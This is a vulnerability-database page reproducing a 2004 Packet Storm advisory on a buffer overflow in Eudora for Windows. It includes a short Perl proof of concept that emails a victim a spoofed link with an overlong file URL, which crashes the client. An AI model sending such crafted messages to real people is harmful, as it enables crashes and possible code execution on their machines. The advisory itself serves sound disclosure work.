Lucene search

eudoraURL.txt

🗓️ 09 May 2004 00:00:00Reported by Paul SzaboType

packetstorm🔗 packetstormsecurity.com👁 21 Views

Buffer overflow in Eudora for Windows allows arbitrary code execution, affecting versions 6.1, 6.0.3, 5.2.1.

AI Insights are available for you today

Leverage the power of AI to quickly understand vulnerabilities, impacts, and exploitability

`There is a buffer overflow in Eudora for Windows, verified on versions  
6.1, 6.0.3 and 5.2.1. This is easily exploitable to run arbitrary code.  
I do not know if this issue affects Eudora for Macs.  
  
Demo:  
  
#!/usr/bin/perl --  
print "From: me\n";  
print "To: you\n";  
print "Subject: Eudora file URL buffer overflow demo\n";  
print "X-Use: Pipe the output of this script into: sendmail -i victim\n\n";  
print "The following is a \"proper\" HTML URL, pointing to somewhere long:\n";  
print "<x-html>\n";  
print "<a href=\"C:\\", "A"x300, "\">\n";  
print "Fake URL to http://anywhere/I/want</a>\n";  
print "</x-html>\n";  
print "Clicking above will crash Eudora.\n\n";  
print "The following plain-text converted by Eudora into a clickable URL\n";  
print "http://www.maths.usyd.edu.au:8000/u/psz/securepc.html#Eudoraxx\n";  
print "is for comparison: the user can hardly tell them apart.\n\n";  
  
Cheers,  
  
Paul Szabo - [email protected] http://www.maths.usyd.edu.au:8000/u/psz/  
School of Mathematics and Statistics University of Sydney 2006 Australia  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo

09 May 2004 00:00Current

7.4High risk

Vulners AI Score7.4